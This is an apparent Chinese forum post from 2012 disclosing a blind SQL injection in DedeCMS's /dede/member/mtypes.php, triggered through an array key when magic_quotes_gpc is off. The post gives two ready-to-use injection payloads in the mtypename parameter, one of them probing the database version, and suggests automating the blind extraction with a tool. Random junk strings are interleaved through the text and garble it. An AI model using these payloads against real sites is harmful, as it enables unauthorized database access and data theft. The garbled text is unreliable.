需要magic_quotes_gpc = Off,所以说是鸡肋啊.+ Y4 a+ ~% q1 u. D: S
0 ^( S8 v; ]* w) v- d
' P; t7 g$ N: ?
发生在数组key里的注射漏洞,有点意思.
, g2 j$ Z0 L6 T# Z
3 C% ~$ f% o3 ]" y# q( J, r y这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下+ c( V# q6 {- _7 z( N4 q% f, N
9 d- o, O% |) [# n$ V; K# j1 X
http://www.xxx.com /dede/member/mtypes.php?dopost=save
. | z8 m1 Z7 L3 O* h: ]: H; t 2 m$ z8 y( f. y+ `' e7 U
exploit:
3 ^9 W7 X" v! Q' p1 c( e+ m+ vmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
6 Y2 B' P% Y3 \6 Zmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r( ]8 [: Q0 F2 U' |! J) F
|
发表于 2012-12-20 08:08:09
收藏
支持
反对